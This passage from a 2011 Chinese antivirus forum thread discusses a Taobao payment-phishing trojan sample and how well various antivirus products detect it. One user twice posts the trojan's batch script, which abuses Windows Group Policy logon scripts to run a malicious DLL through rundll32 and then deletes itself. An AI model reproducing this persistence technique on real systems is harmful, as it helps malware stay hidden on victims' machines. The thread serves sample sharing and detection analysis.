楼主: fuxudong
收起左侧

[病毒样本] 淘宝木马

  [复制链接]
jefffire
头像被屏蔽
发表于 2011-4-23 11:45:02 | 显示全部楼层
wjcharles 发表于 2011-4-22 22:58
恩,但感觉只有部分支付宝钓鱼类型进入了sonar特征,还有很多依旧拦不了。。。

应该是sonar特征还没抓准。
klinxun
发表于 2011-4-23 13:41:15 | 显示全部楼层
回复 71楼 jefffire 的帖子

是不是要多点样本进行分析才能抓得准的?
jefffire
头像被屏蔽
发表于 2011-4-23 13:43:29 | 显示全部楼层
klinxun 发表于 2011-4-23 13:41
回复 71楼 jefffire 的帖子

是不是要多点样本进行分析才能抓得准的?

是的,需要足够的样本数量。这类样本要确保误报低的前提下检出率又高,很不容易。
klinxun
发表于 2011-4-23 14:36:15 | 显示全部楼层
回复 73楼 jefffire 的帖子

看来下载智能分析要是支持阿里旺旺等会好些。诺顿的社区信誉貌似不仅仅是文件信誉,还有url方面的?
hzz2009
发表于 2011-4-23 14:41:56 | 显示全部楼层
好》》强大
a445441
发表于 2011-4-23 15:48:38 | 显示全部楼层
微点2.0不报
qq334705250
发表于 2011-4-23 19:29:35 | 显示全部楼层
微点2.0 诶伤心了
yusup
发表于 2011-4-24 19:28:52 | 显示全部楼层
熊猫云表示没有吃到鸭梨。
zhousulin5
发表于 2011-4-29 12:33:32 | 显示全部楼层
set di=%systemroot%\system32\GroupPolicy\user\Scripts

md %di%\Startup

md %di%\Shutdown

attrib %windir%\system32\GroupPolicy\*.* -r -s -h /s /d

del %windir%\System32\GroupPolicy\gpt.ini

set qs=%systemroot%\system32\GroupPolicy

>%qs%\gpt.ini echo [General]

>>%qs%\gpt.ini echo gPCFunctionalityVersion=2

>>%qs%\gpt.ini echo gPCUserExtensionNames=[{42B5FAAE-6536-11D2-AE5A-0000F87571E3}

{40B66650-4972-11D1-A7CA-0000F87571E3}]

>>%qs%\gpt.ini echo Version=65536

>script.ini echo [Logon]

>>script.ini echo 0CmdLine=%windir%\system32\rundll32.exe

>>script.ini echo 0Parameters="C:\Program Files\QW.DLL",FW

xcopy /y script.ini %windir%\System32\GroupPolicy\user\Scripts\

del script.ini

del %windir%\System32\GroupPolicy\user\Scripts\scripts.ini

ren %windir%\System32\GroupPolicy\user\Scripts\script.ini scripts.ini

gpupdate /force

del %0
rundll32.exe C:\Mydll.dll,DLLAPI

===========================
这谁弄的?竟然想到了利用系统策略。没有最委琐,只有更委琐。
zhousulin5
发表于 2011-4-29 12:35:06 | 显示全部楼层
本帖最后由 zhousulin5 于 2011-4-29 12:35 编辑

set di=%systemroot%\system32\GroupPolicy\user\Scripts

md %di%\Startup

md %di%\Shutdown

attrib %windir%\system32\GroupPolicy\*.* -r -s -h /s /d

del %windir%\System32\GroupPolicy\gpt.ini

set qs=%systemroot%\system32\GroupPolicy

>%qs%\gpt.ini echo [General]

>>%qs%\gpt.ini echo gPCFunctionalityVersion=2

>>%qs%\gpt.ini echo gPCUserExtensionNames=[{42B5FAAE-6536-11D2-AE5A-0000F87571E3}

{40B66650-4972-11D1-A7CA-0000F87571E3}]

>>%qs%\gpt.ini echo Version=65536

>script.ini echo [Logon]

>>script.ini echo 0CmdLine=%windir%\system32\rundll32.exe

>>script.ini echo 0Parameters="C:\Program Files\QW.DLL",FW

xcopy /y script.ini %windir%\System32\GroupPolicy\user\Scripts\

del script.ini

del %windir%\System32\GroupPolicy\user\Scripts\scripts.ini

ren %windir%\System32\GroupPolicy\user\Scripts\script.ini scripts.ini

gpupdate /force

del %0
rundll32.exe C:\Mydll.dll,DLLAPI

======================
bat.bat和bats.bat内容是一样的啊。
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-24 18:54 , Processed in 0.086199 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表